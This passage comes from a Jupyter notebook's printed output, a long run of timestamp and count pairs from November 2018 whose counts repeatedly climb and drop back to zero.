"['2018-11-26 21:08:47', '21']\n",
"['2018-11-26 21:09:21', '21']\n",
"['2018-11-26 21:10:30', '20']\n",
"['2018-11-26 21:11:45', '20']\n",
"['2018-11-26 21:15:45', '25']\n",
"['2018-11-26 21:17:47', '23']\n",
"['2018-11-26 21:20:06', '16']\n",
"['2018-11-26 21:21:41', '18']\n",
"['2018-11-26 21:22:04', '16']\n",
"['2018-11-26 21:23:37', '17']\n",
"['2018-11-26 21:24:05', '17']\n",
"['2018-11-26 21:25:05', '15']\n",
"['2018-11-26 21:26:50', '16']\n",
"['2018-11-26 21:27:35', '16']\n",
"['2018-11-26 21:28:47', '15']\n",
"['2018-11-26 21:30:45', '17']\n",
"['2018-11-26 21:31:34', '14']\n",
"['2018-11-26 21:32:35', '16']\n",
"['2018-11-26 21:33:03', '21']\n",
"['2018-11-26 21:33:20', '17']\n",
"['2018-11-26 21:33:55', '17']\n",
"['2018-11-26 21:34:41', '17']\n",
"['2018-11-26 21:35:49', '17']\n",
"['2018-11-26 21:36:51', '16']\n",
"['2018-11-26 21:37:38', '14']\n",
"['2018-11-26 21:38:08', '11']\n",
"['2018-11-26 21:41:30', '11']\n",
"['2018-11-26 21:42:58', '0']\n",
"['2018-11-26 21:45:55', '4']\n",
"['2018-11-26 21:46:29', '9']\n",
"['2018-11-26 21:50:25', '9']\n",
"['2018-11-26 21:51:11', '11']\n",
"['2018-11-26 21:52:07', '11']\n",
"['2018-11-26 21:52:48', '14']\n",
"['2018-11-26 21:54:09', '14']\n",
"['2018-11-26 21:54:32', '17']\n",
"['2018-11-26 21:55:25', '17']\n",
"['2018-11-26 21:56:19', '21']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 21:56:55', '22']\n",
"['2018-11-26 21:57:18', '22']\n",
"['2018-11-26 21:57:59', '26']\n",
"['2018-11-26 21:58:57', '23']\n",
"['2018-11-26 21:59:58', '23']\n",
"['2018-11-26 22:01:11', '22']\n",
"['2018-11-26 22:01:28', '24']\n",
"['2018-11-26 22:01:56', '22']\n",
"['2018-11-26 22:02:46', '18']\n",
"['2018-11-26 22:03:29', '18']\n",
"['2018-11-26 22:05:02', '15']\n",
"['2018-11-26 22:05:49', '15']\n",
"['2018-11-26 22:07:44', '10']\n",
"['2018-11-26 22:08:22', '10']\n",
"['2018-11-26 22:10:44', '0']\n",
"['2018-11-22 07:00:05', '1']\n",
"['2018-11-22 07:00:45', '1']\n",
"['2018-11-22 07:01:57', '1']\n",
"['2018-11-22 07:02:54', '1']\n",
"['2018-11-22 07:03:47', '2']\n",
"['2018-11-22 07:05:11', '5']\n",
"['2018-11-22 07:05:29', '5']\n",
"['2018-11-22 07:05:57', '6']\n",
"['2018-11-22 07:06:51', '8']\n",
"['2018-11-22 07:07:43', '7']\n",
"['2018-11-22 07:08:47', '8']\n",
"['2018-11-22 07:09:31', '7']\n",
"['2018-11-22 07:10:57', '7']\n",
"['2018-11-22 07:11:29', '7']\n",
"['2018-11-22 07:12:15', '0']\n",
"['2018-11-22 07:16:08', '2']\n",
"['2018-11-22 07:18:14', '2']\n",
"['2018-11-22 07:18:57', '2']\n",
"['2018-11-22 07:19:40', '2']\n",
"['2018-11-22 07:20:08', '2']\n",
"['2018-11-22 07:20:42', '3']\n",
"['2018-11-22 07:21:48', '3']\n",
"['2018-11-22 07:22:24', '2']\n",
"['2018-11-22 07:23:53', '2']\n",
"['2018-11-22 07:24:58', '0']\n",
"['2018-11-22 07:26:05', '0']\n",
"['2018-11-22 07:26:59', '0']\n",
"['2018-11-22 07:28:43', '0']\n",
"['2018-11-22 07:29:59', '0']\n",
"['2018-11-22 07:30:36', '0']\n",
"['2018-11-22 07:32:20', '0']\n",
"['2018-11-22 07:34:06', '0']\n",
"['2018-11-22 07:35:00', '0']\n",
"['2018-11-22 07:35:54', '0']\n",
"['2018-11-22 07:36:48', '0']\n",
"['2018-11-22 07:37:42', '1']\n",
"['2018-11-22 07:38:24', '1']\n",
"['2018-11-22 07:38:53', '0']\n",
"['2018-11-22 07:45:09', '1']\n",
"['2018-11-22 07:45:25', '1']\n",
"['2018-11-22 07:47:13', '1']\n",
"['2018-11-22 07:49:32', '2']\n",
"['2018-11-22 07:50:46', '2']\n",
"['2018-11-22 07:51:12', '2']\n",
"['2018-11-22 07:52:08', '3']\n",
"['2018-11-22 07:53:31', '5']\n",
"['2018-11-22 07:54:23', '10']\n",
"['2018-11-22 07:55:31', '10']\n",
"['2018-11-22 07:56:19', '10']\n",
"['2018-11-22 07:56:52', '10']\n",
"['2018-11-22 07:57:45', '10']\n",
"['2018-11-22 07:58:28', '9']\n",
"['2018-11-22 08:00:55', '9']\n",
"['2018-11-22 08:01:18', '9']\n",
"['2018-11-22 08:03:14', '9']\n",
"['2018-11-22 08:03:36', '9']\n",
"['2018-11-22 08:05:28', '0']\n",
"['2018-11-22 08:11:04', '15']\n",
"['2018-11-22 08:14:52', '13']\n",
"['2018-11-22 08:15:05', '13']\n",
"['2018-11-22 08:16:09', '11']\n",
"['2018-11-22 08:17:13', '11']\n",
"['2018-11-22 08:18:17', '11']\n",
"['2018-11-22 08:19:30', '11']\n",
"['2018-11-22 08:22:13', '11']\n",
"['2018-11-22 08:23:14', '7']\n",
"['2018-11-22 08:24:16', '4']\n",
"['2018-11-22 08:25:18', '2']\n",
"['2018-11-22 08:26:20', '1']\n",
"['2018-11-22 08:27:20', '1']\n",
"['2018-11-22 08:28:40', '1']\n",
"['2018-11-22 08:29:37', '1']\n",
"['2018-11-22 08:30:34', '1']\n",
"['2018-11-22 08:31:31', '1']\n",
"['2018-11-22 08:32:29', '5']\n",
"['2018-11-22 08:33:34', '6']\n",
"['2018-11-22 08:35:47', '6']\n",
"['2018-11-22 08:36:23', '6']\n",
"['2018-11-22 08:36:31', '7']\n",
"['2018-11-22 08:37:22', '0']\n",
"['2018-11-22 08:38:53', '17']\n",
"['2018-11-22 08:40:24', '25']\n",
"['2018-11-22 08:41:55', '27']\n",
"['2018-11-22 08:43:27', '28']\n",
"['2018-11-22 08:44:58', '42']\n",
"['2018-11-22 08:46:29', '42']\n",
"['2018-11-22 08:48:01', '41']\n",
"['2018-11-22 08:49:32', '45']\n",
"['2018-11-22 08:51:03', '52']\n",
"['2018-11-22 08:52:35', '36']\n",
"['2018-11-22 08:54:06', '35']\n",
"['2018-11-22 08:55:37', '36']\n",
"['2018-11-22 08:57:08', '25']\n",
"['2018-11-22 08:58:40', '23']\n",
"['2018-11-22 09:00:11', '13']\n",
"['2018-11-22 09:01:42', '5']\n",
"['2018-11-22 09:03:14', '5']\n",
"['2018-11-22 09:04:45', '5']\n",
"['2018-11-22 09:06:16', '0']\n",
"['2018-11-22 09:07:48', '18']\n",
"['2018-11-22 09:12:29', '26']\n",
"['2018-11-22 09:23:47', '20']\n",
"['2018-11-22 09:24:18', '20']\n",
"['2018-11-22 09:24:50', '17']\n",
"['2018-11-22 09:25:21', '13']\n",
"['2018-11-22 09:25:53', '9']\n",
"['2018-11-22 09:26:24', '6']\n",
"['2018-11-22 09:26:56', '4']\n",
"['2018-11-22 09:27:27', '3']\n",
"['2018-11-22 09:27:59', '3']\n",
"['2018-11-22 09:28:30', '3']\n",
"['2018-11-22 09:29:02', '2']\n",
"['2018-11-22 09:29:34', '1']\n",
"['2018-11-22 09:30:06', '1']\n",
"['2018-11-22 09:31:17', '1']\n",
"['2018-11-22 09:32:28', '0']\n",
"['2018-11-22 09:33:22', '0']\n",
"['2018-11-22 09:34:06', '0']\n",
"['2018-11-22 09:36:00', '0']\n",
"['2018-11-22 09:37:55', '0']\n",
"['2018-11-22 09:39:49', '0']\n",
"['2018-11-22 09:41:44', '0']\n",
"['2018-11-22 09:43:39', '0']\n",
"['2018-11-22 09:45:15', '1']\n",
"['2018-11-22 09:46:51', '2']\n",
"['2018-11-22 09:47:56', '2']\n",
"['2018-11-22 09:49:02', '3']\n",
"['2018-11-22 09:50:07', '4']\n",
"['2018-11-22 09:51:13', '7']\n",
"['2018-11-22 09:55:01', '16']\n",
"['2018-11-22 09:58:49', '18']\n",
"['2018-11-22 10:02:38', '26']\n",
"['2018-11-22 10:06:26', '29']\n",
"['2018-11-22 10:10:15', '29']\n",
"['2018-11-22 10:14:03', '39']\n",
"['2018-11-22 10:17:52', '35']\n",
"['2018-11-22 10:17:59', '32']\n",
"['2018-11-22 10:18:07', '33']\n",
"['2018-11-22 10:18:15', '33']\n",
"['2018-11-22 10:18:23', '33']\n",
"['2018-11-22 10:18:30', '0']\n",
"['2018-11-22 10:18:38', '18']\n",
"['2018-11-22 10:18:46', '18']\n",
"['2018-11-22 10:18:54', '17']\n",
"['2018-11-22 10:19:01', '14']\n",
"['2018-11-22 10:19:09', '14']\n",
"['2018-11-22 10:19:17', '12']\n",
"['2018-11-22 10:19:25', '9']\n",
"['2018-11-22 10:19:33', '7']\n",
"['2018-11-22 10:20:57', '6']\n",
"['2018-11-22 10:22:47', '4']\n",
"['2018-11-22 10:23:34', '2']\n",
"['2018-11-22 10:24:45', '2']\n",
"['2018-11-22 10:26:16', '2']\n",
"['2018-11-22 10:27:48', '2']\n",
"['2018-11-22 10:29:20', '2']\n",
"['2018-11-22 10:30:52', '2']\n",
"['2018-11-22 10:32:24', '1']\n",
"['2018-11-22 10:33:56', '0']\n",
"['2018-11-22 10:35:27', '0']\n",
"['2018-11-22 10:36:59', '0']\n",
"['2018-11-22 10:38:31', '3']\n",
"['2018-11-22 10:40:03', '4']\n",
"['2018-11-22 10:41:35', '0']\n",
"['2018-11-22 10:43:07', '7']\n",
"['2018-11-22 10:44:38', '8']\n",
"['2018-11-22 10:46:10', '8']\n",
"['2018-11-22 10:47:42', '8']\n",
"['2018-11-22 10:49:14', '9']\n",
"['2018-11-22 10:50:46', '11']\n",
"['2018-11-22 10:52:18', '11']\n",
"['2018-11-22 10:53:49', '13']\n",
"['2018-11-22 10:55:21', '16']\n",
"['2018-11-22 10:56:53', '16']\n",
"['2018-11-22 10:58:25', '15']\n",
"['2018-11-22 10:59:57', '14']\n",
"['2018-11-22 11:01:29', '12']\n",
"['2018-11-22 11:03:00', '12']\n",
"['2018-11-22 11:04:32', '8']\n",
"['2018-11-22 11:06:04', '9']\n",
"['2018-11-22 11:07:36', '8']\n",
"['2018-11-22 11:09:08', '8']\n",
"['2018-11-22 11:10:40', '0']\n",
"['2018-11-22 11:12:12', '13']\n",
"['2018-11-22 11:13:11', '15']\n",
"['2018-11-22 11:15:11', '17']\n",
"['2018-11-22 11:16:45', '17']\n",
"['2018-11-22 11:17:49', '16']\n",
"['2018-11-22 11:19:19', '15']\n",
"['2018-11-22 11:20:23', '16']\n",
"['2018-11-22 11:21:50', '13']\n",
"['2018-11-22 11:23:24', '10']\n",
"['2018-11-22 11:24:57', '4']\n",
"['2018-11-22 11:25:19', '4']\n",
"['2018-11-22 11:26:22', '5']\n",
"['2018-11-22 11:27:59', '5']\n",
"['2018-11-22 11:28:56', '6']\n",
"['2018-11-22 11:30:06', '6']\n",
"['2018-11-22 11:31:17', '6']\n",
"['2018-11-22 11:32:25', '2']\n",
"['2018-11-22 11:33:22', '2']\n",
"['2018-11-22 11:34:20', '1']\n",
"['2018-11-22 11:35:17', '1']\n",
"['2018-11-22 11:36:15', '1']\n",
"['2018-11-22 11:36:46', '1']\n",
"['2018-11-22 11:37:11', '0']\n",
"['2018-11-22 11:43:52', '3']\n",
"['2018-11-22 11:44:04', '4']\n",
"['2018-11-22 11:45:41', '4']\n",
"['2018-11-22 11:47:26', '4']\n",
"['2018-11-22 11:48:29', '4']\n",
"['2018-11-22 11:49:05', '4']\n",
"['2018-11-22 11:50:01', '5']\n",
"['2018-11-22 11:51:41', '10']\n",
"['2018-11-22 11:53:12', '10']\n",
"['2018-11-22 11:54:22', '10']\n",
"['2018-11-22 11:54:43', '10']\n",
"['2018-11-22 11:56:25', '13']\n",
"['2018-11-22 11:57:49', '11']\n",
"['2018-11-22 11:59:07', '6']\n",
"['2018-11-22 12:01:19', '3']\n",
"['2018-11-22 12:03:39', '3']\n",
"['2018-11-22 12:06:34', '3']\n",
"['2018-11-22 12:07:39', '3']\n",
"['2018-11-22 12:08:23', '0']\n",
"['2018-11-22 12:11:17', '2']\n",
"['2018-11-22 12:12:33', '2']\n",
"['2018-11-22 12:14:39', '3']\n",
"['2018-11-22 12:18:05', '2']\n",
"['2018-11-22 12:18:24', '3']\n",
"['2018-11-22 12:20:27', '5']\n",
"['2018-11-22 12:21:58', '5']\n",
"['2018-11-22 12:22:39', '5']\n",
"['2018-11-22 12:23:06', '5']\n",
"['2018-11-22 12:24:55', '2']\n",
"['2018-11-22 12:25:49', '1']\n",
"['2018-11-22 12:27:00', '0']\n",
"['2018-11-22 12:28:42', '0']\n",
"['2018-11-22 12:29:41', '0']\n",
"['2018-11-22 12:30:16', '0']\n",
"['2018-11-22 12:31:35', '0']\n",
"['2018-11-22 12:32:57', '0']\n",
"['2018-11-22 12:33:39', '0']\n",
"['2018-11-22 12:34:21', '0']\n",
"['2018-11-22 12:35:03', '0']\n",
"['2018-11-22 12:35:45', '0']\n",
"['2018-11-22 12:36:22', '0']\n",
"['2018-11-22 12:36:46', '0']\n",
"['2018-11-22 12:43:52', '1']\n",
"['2018-11-22 12:44:05', '2']\n",
"['2018-11-22 12:45:41', '2']\n",
"['2018-11-22 12:47:26', '2']\n",
"['2018-11-22 12:48:07', '4']\n",
"['2018-11-22 12:49:18', '4']\n",
"['2018-11-22 12:50:25', '4']\n",
"['2018-11-22 12:51:33', '4']\n",
"['2018-11-22 12:51:56', '5']\n",
"['2018-11-22 12:53:59', '5']\n",
"['2018-11-22 12:54:12', '6']\n",
"['2018-11-22 12:56:12', '7']\n",
"['2018-11-22 12:58:06', '7']\n",
"['2018-11-22 13:00:13', '7']\n",
"['2018-11-22 13:02:54', '6']\n",
"['2018-11-22 13:03:57', '6']\n",
"['2018-11-22 13:06:11', '5']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 13:06:55', '4']\n",
"['2018-11-22 13:08:05', '0']\n",
"['2018-11-22 13:12:22', '17']\n",
"['2018-11-22 13:13:50', '19']\n",
"['2018-11-22 13:16:14', '20']\n",
"['2018-11-22 13:17:23', '20']\n",
"['2018-11-22 13:19:37', '22']\n",
"['2018-11-22 13:20:47', '17']\n",
"['2018-11-22 13:22:11', '18']\n",
"['2018-11-22 13:23:25', '9']\n",
"['2018-11-22 13:24:37', '6']\n",
"['2018-11-22 13:26:29', '3']\n",
"['2018-11-22 13:27:16', '2']\n",
"['2018-11-22 13:28:18', '1']\n",
"['2018-11-22 13:30:00', '1']\n",
"['2018-11-22 13:31:01', '1']\n",
"['2018-11-22 13:31:34', '1']\n",
"['2018-11-22 13:32:37', '1']\n",
"['2018-11-22 13:33:28', '0']\n",
"['2018-11-22 13:34:18', '0']\n",
"['2018-11-22 13:35:09', '0']\n",
"['2018-11-22 13:36:00', '0']\n",
"['2018-11-22 13:36:51', '0']\n",
"['2018-11-22 13:37:32', '0']\n",
"['2018-11-22 13:38:03', '0']\n",
"['2018-11-22 13:43:14', '1']\n",
"['2018-11-22 13:43:25', '2']\n",
"['2018-11-22 13:44:57', '2']\n",
"['2018-11-22 13:46:39', '2']\n",
"['2018-11-22 13:47:29', '2']\n",
"['2018-11-22 13:48:01', '2']\n",
"['2018-11-22 13:49:02', '2']\n",
"['2018-11-22 13:49:45', '3']\n",
"['2018-11-22 13:50:28', '4']\n",
"['2018-11-22 13:51:39', '3']\n",
"['2018-11-22 13:52:40', '3']\n",
"['2018-11-22 13:53:33', '3']\n",
"['2018-11-22 13:54:19', '3']\n",
"['2018-11-22 13:55:28', '7']\n",
"['2018-11-22 13:57:18', '8']\n",
"['2018-11-22 13:59:14', '6']\n",
"['2018-11-22 14:01:58', '6']\n",
"['2018-11-22 14:03:30', '6']\n",
"['2018-11-22 14:04:15', '0']\n",
"['2018-11-22 14:08:26', '21']\n",
"['2018-11-22 14:13:12', '22']\n",
"['2018-11-22 14:15:39', '24']\n",
"['2018-11-22 14:18:44', '24']\n",
"['2018-11-22 14:19:09', '25']\n",
"['2018-11-22 14:20:40', '28']\n",
"['2018-11-22 14:21:49', '27']\n",
"['2018-11-22 14:23:46', '22']\n",
"['2018-11-22 14:25:01', '17']\n",
"['2018-11-22 14:26:45', '14']\n",
"['2018-11-22 14:27:34', '8']\n",
"['2018-11-22 14:28:47', '9']\n",
"['2018-11-22 14:30:35', '6']\n",
"['2018-11-22 14:31:45', '7']\n",
"['2018-11-22 14:32:48', '7']\n",
"['2018-11-22 14:34:07', '7']\n",
"['2018-11-22 14:35:09', '3']\n",
"['2018-11-22 14:36:06', '2']\n",
"['2018-11-22 14:37:04', '2']\n",
"['2018-11-22 14:38:02', '2']\n",
"['2018-11-22 14:39:00', '0']\n",
"['2018-11-22 14:39:58', '0']\n",
"['2018-11-22 14:40:56', '0']\n",
"['2018-11-22 14:41:54', '0']\n",
"['2018-11-22 14:42:05', '0']\n",
"['2018-11-22 14:43:30', '0']\n",
"['2018-11-22 14:45:12', '0']\n",
"['2018-11-22 14:45:57', '0']\n",
"['2018-11-22 14:47:01', '1']\n",
"['2018-11-22 14:47:57', '4']\n",
"['2018-11-22 14:49:30', '6']\n",
"['2018-11-22 14:50:52', '6']\n",
"['2018-11-22 14:51:37', '7']\n",
"['2018-11-22 14:52:29', '8']\n",
"['2018-11-22 14:53:49', '12']\n",
"['2018-11-22 14:55:16', '21']\n",
"['2018-11-22 14:56:20', '20']\n",
"['2018-11-22 14:58:12', '23']\n",
"['2018-11-22 14:59:03', '25']\n",
"['2018-11-22 15:01:15', '24']\n",
"['2018-11-22 15:02:04', '24']\n",
"['2018-11-22 15:03:49', '0']\n",
"['2018-11-22 15:11:02', '13']\n",
"['2018-11-22 15:17:38', '13']\n",
"['2018-11-22 15:19:10', '15']\n",
"['2018-11-22 15:21:25', '16']\n",
"['2018-11-22 15:22:22', '20']\n",
"['2018-11-22 15:23:54', '21']\n",
"['2018-11-22 15:25:31', '25']\n",
"['2018-11-22 15:27:36', '17']\n",
"['2018-11-22 15:29:14', '15']\n",
"['2018-11-22 15:32:19', '16']\n",
"['2018-11-22 15:33:08', '13']\n",
"['2018-11-22 15:34:26', '13']\n",
"['2018-11-22 15:35:34', '12']\n",
"['2018-11-22 15:36:34', '9']\n",
"['2018-11-22 15:37:44', '9']\n",
"['2018-11-22 15:38:59', '8']\n",
"['2018-11-22 15:40:32', '2']\n",
"['2018-11-22 15:41:33', '0']\n",
"['2018-11-22 15:42:35', '0']\n",
"['2018-11-22 15:43:37', '0']\n",
"['2018-11-22 15:44:39', '0']\n",
"['2018-11-22 15:45:41', '0']\n",
"['2018-11-22 15:46:43', '0']\n",
"['2018-11-22 15:47:45', '0']\n",
"['2018-11-22 15:47:58', '0']\n",
"['2018-11-22 15:49:18', '0']\n",
"['2018-11-22 15:51:00', '0']\n",
"['2018-11-22 15:51:39', '1']\n",
"['2018-11-22 15:53:02', '1']\n",
"['2018-11-22 15:54:02', '1']\n",
"['2018-11-22 15:54:52', '2']\n",
"['2018-11-22 15:55:47', '3']\n",
"['2018-11-22 15:57:27', '7']\n",
"['2018-11-22 15:58:21', '10']\n",
"['2018-11-22 15:59:52', '13']\n",
"['2018-11-22 16:01:41', '11']\n",
"['2018-11-22 16:03:34', '16']\n",
"['2018-11-22 16:04:51', '13']\n",
"['2018-11-22 16:06:35', '13']\n",
"['2018-11-22 16:07:20', '11']\n",
"['2018-11-22 16:07:33', '8']\n",
"['2018-11-22 16:09:34', '0']\n",
"['2018-11-22 16:11:25', '22']\n",
"['2018-11-22 16:12:29', '22']\n",
"['2018-11-22 16:13:01', '22']\n",
"['2018-11-22 16:15:13', '22']\n",
"['2018-11-22 16:16:06', '13']\n",
"['2018-11-22 16:17:57', '12']\n",
"['2018-11-22 16:19:39', '11']\n",
"['2018-11-22 16:20:54', '7']\n",
"['2018-11-22 16:22:48', '7']\n",
"['2018-11-22 16:23:46', '3']\n",
"['2018-11-22 16:24:31', '2']\n",
"['2018-11-22 16:25:41', '2']\n",
"['2018-11-22 16:26:57', '2']\n",
"['2018-11-22 16:27:59', '2']\n",
"['2018-11-22 16:28:29', '2']\n",
"['2018-11-22 16:29:47', '2']\n",
"['2018-11-22 16:31:14', '2']\n",
"['2018-11-22 16:32:14', '1']\n",
"['2018-11-22 16:33:14', '0']\n",
"['2018-11-22 16:34:14', '0']\n",
"['2018-11-22 16:35:15', '0']\n",
"['2018-11-22 16:35:55', '0']\n",
"['2018-11-22 16:36:53', '0']\n",
"['2018-11-22 16:37:51', '1']\n",
"['2018-11-22 16:38:49', '2']\n",
"['2018-11-22 16:39:47', '2']\n",
"['2018-11-22 16:40:45', '2']\n",
"['2018-11-22 16:41:43', '2']\n",
"['2018-11-22 16:42:41', '2']\n",
"['2018-11-22 16:43:39', '2']\n",
"['2018-11-22 16:44:37', '2']\n",
"['2018-11-22 16:44:58', '3']\n",
"['2018-11-22 16:46:38', '5']\n",
"['2018-11-22 16:47:35', '9']\n",
"['2018-11-22 16:49:33', '13']\n",
"['2018-11-22 16:50:49', '17']\n",
"['2018-11-22 16:52:14', '20']\n",
"['2018-11-22 16:53:58', '26']\n",
"['2018-11-22 16:55:44', '27']\n",
"['2018-11-22 16:58:27', '27']\n",
"['2018-11-22 16:58:45', '28']\n",
"['2018-11-22 17:01:14', '0']\n",
"['2018-11-22 17:04:25', '19']\n",
"['2018-11-22 17:05:38', '20']\n",
"['2018-11-22 17:08:18', '20']\n",
"['2018-11-22 17:09:41', '20']\n",
"['2018-11-22 17:10:06', '24']\n",
"['2018-11-22 17:11:15', '26']\n",
"['2018-11-22 17:12:39', '20']\n",
"['2018-11-22 17:14:55', '19']\n",
"['2018-11-22 17:15:35', '15']\n",
"['2018-11-22 17:16:32', '14']\n",
"['2018-11-22 17:17:29', '12']\n",
"['2018-11-22 17:18:06', '10']\n",
"['2018-11-22 17:19:36', '10']\n",
"['2018-11-22 17:20:33', '10']\n",
"['2018-11-22 17:21:05', '10']\n",
"['2018-11-22 17:22:04', '10']\n",
"['2018-11-22 17:23:00', '2']\n",
"['2018-11-22 17:24:04', '2']\n",
"['2018-11-22 17:25:09', '1']\n",
"['2018-11-22 17:26:14', '1']\n",
"['2018-11-22 17:27:19', '1']\n",
"['2018-11-22 17:28:10', '1']\n",
"['2018-11-22 17:28:34', '0']\n",
"['2018-11-22 17:30:43', '0']\n",
"['2018-11-22 17:30:55', '2']\n",
"['2018-11-22 17:32:21', '2']\n",
"['2018-11-22 17:33:50', '2']\n",
"['2018-11-22 17:34:54', '2']\n",
"['2018-11-22 17:35:31', '2']\n",
"['2018-11-22 17:36:41', '9']\n",
"['2018-11-22 17:37:55', '10']\n",
"['2018-11-22 17:38:43', '11']\n",
"['2018-11-22 17:40:01', '13']\n",
"['2018-11-22 17:40:59', '15']\n",
"['2018-11-22 17:42:27', '14']\n",
"['2018-11-22 17:44:59', '14']\n",
"['2018-11-22 17:45:56', '14']\n",
"['2018-11-22 17:47:11', '11']\n",
"['2018-11-22 17:48:15', '12']\n",
"['2018-11-22 17:50:25', '13']\n",
"['2018-11-22 17:52:23', '13']\n",
"['2018-11-22 17:53:13', '0']\n",
"['2018-11-22 17:59:38', '1']\n",
"['2018-11-25 07:27:28', '0']\n",
"['2018-11-25 07:29:06', '0']\n",
"['2018-11-25 07:29:39', '0']\n",
"['2018-11-25 07:30:21', '0']\n",
"['2018-11-25 07:30:52', '0']\n",
"['2018-11-25 07:32:08', '1']\n",
"['2018-11-25 07:32:48', '1']\n",
"['2018-11-25 07:33:31', '1']\n",
"['2018-11-25 07:34:15', '1']\n",
"['2018-11-25 07:35:29', '0']\n",
"['2018-11-25 07:36:25', '0']\n",
"['2018-11-25 07:37:13', '0']\n",
"['2018-11-25 07:38:26', '0']\n",
"['2018-11-25 07:38:32', '0']\n",
"['2018-11-25 07:40:54', '0']\n",
"['2018-11-25 07:41:36', '0']\n",
"['2018-11-25 07:43:05', '1']\n",
"['2018-11-25 07:44:01', '1']\n",
"['2018-11-25 07:44:34', '1']\n",
"['2018-11-25 07:45:26', '1']\n",
"['2018-11-25 07:46:05', '1']\n",
"['2018-11-25 07:46:59', '1']\n",
"['2018-11-25 07:47:39', '1']\n",
"['2018-11-25 07:48:34', '1']\n",
"['2018-11-25 07:49:19', '1']\n",
"['2018-11-25 07:50:31', '1']\n",
"['2018-11-25 07:51:23', '1']\n",
"['2018-11-25 07:52:10', '1']\n",
"['2018-11-25 07:52:54', '0']\n",
"['2018-11-25 08:01:28', '2']\n",
"['2018-11-25 08:03:32', '2']\n",
"['2018-11-25 08:04:17', '2']\n",
"['2018-11-25 08:05:05', '2']\n",
"['2018-11-25 08:05:59', '2']\n",
"['2018-11-25 08:06:41', '1']\n",
"['2018-11-25 08:08:23', '0']\n",
"['2018-11-25 08:10:24', '0']\n",
"['2018-11-25 08:11:03', '0']\n",
"['2018-11-25 08:12:15', '0']\n",
"['2018-11-25 08:12:44', '0']\n",
"['2018-11-25 08:13:49', '0']\n",
"['2018-11-25 08:15:08', '0']\n",
"['2018-11-25 08:15:15', '0']\n",
"['2018-11-25 08:17:51', '1']\n",
"['2018-11-25 08:20:27', '1']\n",
"['2018-11-25 08:23:04', '1']\n",
"['2018-11-25 08:24:01', '1']\n",
"['2018-11-25 08:24:38', '1']\n",
"['2018-11-25 08:25:19', '0']\n",
"['2018-11-25 08:26:16', '0']\n",
"['2018-11-25 08:27:14', '1']\n",
"['2018-11-25 08:28:29', '1']\n",
"['2018-11-25 08:29:08', '1']\n",
"['2018-11-25 08:31:20', '3']\n",
"['2018-11-25 08:32:35', '3']\n",
"['2018-11-25 08:34:38', '3']\n",
"['2018-11-25 08:36:02', '3']\n",
"['2018-11-25 08:36:44', '0']\n",
"['2018-11-25 08:45:48', '2']\n",
"['2018-11-25 08:47:44', '3']\n",
"['2018-11-25 08:48:32', '3']\n",
"['2018-11-25 08:49:42', '2']\n",
"['2018-11-25 08:51:18', '2']\n",
"['2018-11-25 08:52:48', '2']\n",
"['2018-11-25 08:53:46', '2']\n",
"['2018-11-25 08:54:28', '2']\n",
"['2018-11-25 08:55:06', '2']\n",
"['2018-11-25 08:56:04', '1']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 08:57:17', '0']\n",
"['2018-11-25 08:57:53', '0']\n",
"['2018-11-25 08:59:38', '0']\n",
"['2018-11-25 08:59:43', '0']\n",
"['2018-11-25 09:02:50', '0']\n",
"['2018-11-25 09:05:58', '0']\n",
"['2018-11-25 09:09:06', '0']\n",
"['2018-11-25 09:09:56', '0']\n",
"['2018-11-25 09:10:34', '0']\n",
"['2018-11-25 09:11:27', '0']\n",
"['2018-11-25 09:11:48', '0']\n",
"['2018-11-25 09:12:52', '1']\n",
"['2018-11-25 09:13:43', '1']\n",
"['2018-11-25 09:14:15', '1']\n",
"['2018-11-25 09:15:33', '3']\n",
"['2018-11-25 09:17:42', '3']\n",
"['2018-11-25 09:18:38', '3']\n",
"['2018-11-25 09:18:54', '2']\n",
"['2018-11-25 09:20:34', '0']\n",
"['2018-11-25 09:25:05', '2']\n",
"['2018-11-25 09:29:36', '4']\n",
"['2018-11-25 09:34:07', '4']\n",
"['2018-11-25 09:34:51', '4']\n",
"['2018-11-25 09:36:12', '2']\n",
"['2018-11-25 09:38:00', '2']\n",
"['2018-11-25 09:39:12', '2']\n",
"['2018-11-25 09:40:53', '2']\n",
"['2018-11-25 09:41:21', '2']\n",
"['2018-11-25 09:43:01', '2']\n",
"['2018-11-25 09:43:29', '2']\n",
"['2018-11-25 09:44:16', '2']\n",
"['2018-11-25 09:45:32', '2']\n",
"['2018-11-25 09:45:38', '0']\n",
"['2018-11-25 09:47:56', '2']\n",
"['2018-11-25 09:50:14', '2']\n",
"['2018-11-25 09:52:33', '2']\n",
"['2018-11-25 09:53:32', '2']\n",
"['2018-11-25 09:54:15', '2']\n",
"['2018-11-25 09:55:13', '2']\n",
"['2018-11-25 09:55:35', '2']\n",
"['2018-11-25 09:56:16', '2']\n",
"['2018-11-25 09:57:42', '2']\n",
"['2018-11-25 09:59:03', '2']\n",
"['2018-11-25 10:00:35', '2']\n",
"['2018-11-25 10:02:54', '2']\n",
"['2018-11-25 10:03:54', '2']\n",
"['2018-11-25 10:05:21', '2']\n",
"['2018-11-25 10:06:05', '0']\n",
"['2018-11-25 10:17:07', '8']\n",
"['2018-11-25 10:18:26', '8']\n",
"['2018-11-25 10:19:50', '7']\n",
"['2018-11-25 10:20:34', '7']\n",
"['2018-11-25 10:22:13', '6']\n",
"['2018-11-25 10:22:51', '6']\n",
"['2018-11-25 10:24:21', '4']\n",
"['2018-11-25 10:25:26', '3']\n",
"['2018-11-25 10:27:13', '3']\n",
"['2018-11-25 10:28:31', '2']\n",
"['2018-11-25 10:28:53', '2']\n",
"['2018-11-25 10:30:16', '1']\n",
"['2018-11-25 10:32:22', '1']\n",
"['2018-11-25 10:32:30', '0']\n",
"['2018-11-25 10:35:34', '1']\n",
"['2018-11-25 10:36:09', '1']\n",
"['2018-11-25 10:37:27', '1']\n",
"['2018-11-25 10:38:30', '1']\n",
"['2018-11-25 10:40:05', '3']\n",
"['2018-11-25 10:41:06', '3']\n",
"['2018-11-25 10:41:31', '3']\n",
"['2018-11-25 10:43:30', '11']\n",
"['2018-11-25 10:45:15', '13']\n",
"['2018-11-25 10:46:28', '12']\n",
"['2018-11-25 10:48:31', '16']\n",
"['2018-11-25 10:50:19', '17']\n",
"['2018-11-25 10:51:20', '17']\n",
"['2018-11-25 10:52:22', '17']\n",
"['2018-11-25 10:53:18', '0']\n",
"['2018-11-25 11:02:50', '10']\n",
